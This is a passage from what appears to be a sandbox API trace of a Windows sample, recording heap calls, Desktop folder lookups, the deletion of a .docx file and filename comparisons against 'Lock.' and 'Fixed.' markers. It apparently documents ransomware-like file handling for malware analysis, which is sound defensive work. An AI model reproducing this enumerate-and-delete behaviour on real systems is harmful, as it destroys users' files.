lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0161.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0161.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0161.066] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0161.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0161.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0161.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0161.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0161.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0161.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0161.066] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0161.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0161.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0161.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0161.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0161.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0161.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0161.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0161.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0161.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0161.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0161.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0161.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0161.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0161.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0161.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0161.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0161.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0161.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0161.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0161.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0161.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0161.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0161.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0161.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0161.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x68) returned 0x24202f0 [0161.068] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/6qT95vcU.docx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6qT95vcU.docx", lpFilePart=0x8bedfc*="6qT95vcU.docx") returned 0x33 [0161.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0161.069] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6qT95vcU.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6qt95vcu.docx")) returned 0x20 [0161.069] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6qT95vcU.docx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x974a3450, ftCreationTime.dwHighDateTime=0x1d4d511, ftLastAccessTime.dwLowDateTime=0x23e5a160, ftLastAccessTime.dwHighDateTime=0x1d4cf72, ftLastWriteTime.dwLowDateTime=0x23e5a160, ftLastWriteTime.dwHighDateTime=0x1d4cf72, nFileSizeHigh=0x0, nFileSizeLow=0xdc6b, dwReserved0=0x1d, dwReserved1=0x4, cFileName="6qT95vcU.docx", cAlternateFileName="6QT95V~1.DOC")) returned 0xaa5660 [0161.069] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6qT95vcU.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6qt95vcu.docx")) returned 1 [0161.074] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x974a3450, ftCreationTime.dwHighDateTime=0x1d4d511, ftLastAccessTime.dwLowDateTime=0x23e5a160, ftLastAccessTime.dwHighDateTime=0x1d4cf72, ftLastWriteTime.dwLowDateTime=0x23e5a160, ftLastWriteTime.dwHighDateTime=0x1d4cf72, nFileSizeHigh=0x0, nFileSizeLow=0xdc6b, dwReserved0=0x1d, dwReserved1=0x4, cFileName="6qT95vcU.docx", cAlternateFileName="6QT95V~1.DOC")) returned 0 [0161.074] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0161.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0161.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0161.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0161.075] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0161.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0161.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0161.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0161.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0161.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0161.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0161.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0161.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0161.076] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0161.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0161.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0161.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0161.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0161.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0161.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0161.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0161.077] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0161.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0161.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0161.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0161.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0161.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0161.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0161.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0161.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0161.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0161.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0161.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0161.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0161.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0161.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0161.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0161.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0161.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0161.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0161.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0161.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0161.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0161.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0161.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0161.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0161.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0161.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0161.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0161.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0161.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x68) returned 0x24202f0 [0161.080] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/6qT95vcU.docx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6qT95vcU.docx", lpFilePart=0x8bf658*="6qT95vcU.docx") returned 0x33 [0161.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0161.080] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6qT95vcU.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6qt95vcu.docx")) returned 0xffffffff [0161.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0161.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0161.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0161.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0161.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0161.080] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0161.080] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.081] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0161.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0161.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0161.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0161.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0161.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0161.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0161.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0161.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0161.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0161.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0161.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0161.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="81-stuKA.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1-stuKA.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-stuKA.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="stuKA.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tuKA.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uKA.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KA.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0161.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0161.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0161.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0161.083] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0161.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0161.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0161.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0161.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0161.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="81-stuKA.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1-stuKA.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-stuKA.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="stuKA.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tuKA.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uKA.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KA.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.083] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0161.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0161.084] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0161.084] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0161.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0161.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0161.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0161.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0161.084] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0161.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0161.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0161.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0161.084] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0161.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0161.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0161.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0161.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0161.085] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0161.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0161.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0161.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0161.085] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0161.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0161.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0161.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0161.085] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0161.085] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.086] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0161.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.086] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0161.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.086] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.086] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.087] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/81-stuKA.mp4", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91623960, ftCreationTime.dwHighDateTime=0x1d4cb76, ftLastAccessTime.dwLowDateTime=0x11b36480, ftLastAccessTime.dwHighDateTime=0x1d4c6fa, ftLastWriteTime.dwLowDateTime=0x11b36480, ftLastWriteTime.dwHighDateTime=0x1d4c6fa, nFileSizeHigh=0x0, nFileSizeLow=0xdb53, dwReserved0=0xb270006, dwReserved1=0xd1f8, cFileName="81-stuKA.mp4", cAlternateFileName="")) returned 0xaa5660 [0161.087] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0161.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: 